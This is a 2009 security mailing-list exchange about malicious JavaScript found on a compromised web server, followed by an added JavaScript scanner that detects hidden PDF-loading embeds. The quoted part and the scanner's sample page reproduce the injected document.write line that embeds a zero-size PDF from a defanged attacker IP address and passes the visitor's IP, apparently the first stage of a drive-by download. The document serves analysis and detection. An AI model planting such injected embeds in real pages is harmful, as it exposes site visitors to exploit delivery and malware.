Malicious code just found on web server
Paul Ferguson
fergdawgster at gmail.com
Fri Apr 17 22:15:52 UTC 2009
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
On Fri, Apr 17, 2009 at 3:06 PM, Chris Mills <securinate at gmail.com> wrote:
> I took a quick look at the code... formatted it in a pastebin here:
> http://pastebin.com/m7b50be54
>
> That javascript writes this to the page (URL obscured):
> document.write("<embed
> src=\"hXXp://77.92.158.122/webmail/inc/web/include/spl.php?stat=Unknown|Unknown|US|1.2.3.4\"
> width=\"0\" height=\"0\" type=\"application/pdf\"></embed>");
>
> The 1.2.3.4 in the URL is my public IP address (I changed that).
>
> Below the javascript, it grabs a PDF:
> <embed src="include/two.pdf" width="1" height="0"
> style="border:none"></embed>
>
> That PDF is on the site, I haven't looked at it yet though.
>
Most likely a file that exploits a well-known vulnerability in Adobe
Reader, which in turn probably loads malware from yet another location.
We've been seeing a lot of this lately.
- - ferg
-----BEGIN PGP SIGNATURE-----
Version: PGP Desktop 9.5.3 (Build 5003)
wj8DBQFJ6P+Oq1pz9mNUZTMRAgINAJ9nFvTfdP0nNB5IXGCR5U5MKvbBxwCgoZQZ
1dYwVrqBqq9k7RVzAhXtYMY=
=bmbW
-----END PGP SIGNATURE-----
--
"Fergie", a.k.a. Paul Ferguson
Engineering Architecture for the Internet
fergdawgster(at)gmail.com
ferg's tech blog: http://fergdawg.blogspot.com/
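The pattern quoted above (a document.write() that emits a zero-size <embed> of type application/pdf, plus a one-pixel <embed> of a local PDF) is easy to scan for statically. The following is an added example written for this page, not code from the thread or from either poster: it decodes the string arguments of document.write() calls, strips <script> bodies from the remaining markup, and flags embed/iframe/object tags that are zero- or one-pixel sized and load PDF content. The sample page is constructed to mirror the quoted snippets (the defanged hXXp scheme is left as-is), and the one-pixel threshold and the ".php serves a PDF" heuristic are assumptions of this example, not anything the thread states.

```javascript
// Added example (not code from the thread): a static scanner for the hidden
// zero-size <embed> drive-by pattern quoted above. Assumptions: the page
// source is available as a string; defanged URLs (hXXp) are left untouched;
// "tiny" means width or height <= 1 pixel.

// Decode the JS string-literal argument of each document.write("...") call.
function extractDocumentWrites(source) {
  const writes = [];
  const callRe = /document\.write\s*\(\s*(["'])((?:\\.|(?!\1)[^\\])*)\1\s*\)/g;
  let m;
  while ((m = callRe.exec(source)) !== null) {
    const decoded = m[2].replace(/\\(x[0-9a-fA-F]{2}|u[0-9a-fA-F]{4}|[\s\S])/g, (_, esc) => {
      if (esc.length > 1) return String.fromCharCode(parseInt(esc.slice(1), 16)); // \xHH, \uHHHH
      return { n: '\n', r: '\r', t: '\t' }[esc] ?? esc; // \" \' \\ map to themselves
    });
    writes.push(decoded);
  }
  return writes;
}

// Pull name="value" pairs out of one opening tag (unquoted values allowed).
function parseAttrs(tag) {
  const attrs = {};
  const attrRe = /([a-zA-Z-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/g;
  let m;
  while ((m = attrRe.exec(tag)) !== null) {
    attrs[m[1].toLowerCase()] = m[2] ?? m[3] ?? m[4];
  }
  return attrs;
}

// Flag plugin containers that are (near) invisible and carry PDF content.
function findHiddenPdfLoaders(html, origin) {
  const findings = [];
  const tagRe = /<(embed|iframe|object)\b[^>]*>/gi;
  let m;
  while ((m = tagRe.exec(html)) !== null) {
    const a = parseAttrs(m[0]);
    const src = a.src ?? a.data ?? '';
    const w = parseInt(a.width ?? '', 10);
    const h = parseInt(a.height ?? '', 10);
    const tiny = w <= 1 || h <= 1; // NaN (missing/garbled size) compares false
    const isPdf = /application\/pdf/i.test(a.type ?? '') || /\.pdf(\?|$)/i.test(src);
    if (!(tiny && isPdf)) continue;
    const why = ['zero/one-pixel dimensions', 'PDF content'];
    if (/\.php(\?|$)/i.test(src)) why.push('PDF served by a server-side script');
    if (src.includes('?')) why.push('query string may carry a client fingerprint');
    findings.push({ origin, tag: m[1].toLowerCase(), src, why });
  }
  return findings;
}

// Scan a whole page: document.write() output first, then the static markup
// with <script> bodies removed so the same string is not counted twice.
function scanPage(source) {
  const staticHtml = source.replace(/<script\b[^>]*>[\s\S]*?<\/script>/gi, '');
  const fromWrites = extractDocumentWrites(source)
    .flatMap((w) => findHiddenPdfLoaders(w, 'document.write'));
  return [...fromWrites, ...findHiddenPdfLoaders(staticHtml, 'static')];
}

// Constructed sample page modeled on the snippets quoted in the thread;
// the third <embed> is a benign-looking control that must not be flagged.
const SAMPLE_PAGE = `
<html><body>
<script>
document.write("<embed src=\\"hXXp://77.92.158.122/webmail/inc/web/include/spl.php?stat=Unknown|Unknown|US|1.2.3.4\\" width=\\"0\\" height=\\"0\\" type=\\"application/pdf\\"></embed>");
</script>
<embed src="include/two.pdf" width="1" height="0" style="border:none"></embed>
<embed src="intro.swf" width="640" height="480" type="application/x-shockwave-flash"></embed>
</body></html>`;

for (const f of scanPage(SAMPLE_PAGE)) {
  console.log(`[${f.origin}] <${f.tag}> ${f.src}\n    ${f.why.join('; ')}`);
}
```

The script-stripping step matters: scanning the raw source would see the escaped `\"` quotes inside the document.write() string and either mis-parse the sizes or double-count the tag once the decoded copy is scanned. A size of 0 or 1 is only a heuristic; a real crawler would also treat CSS-hidden containers (display:none, off-screen positioning) as invisible.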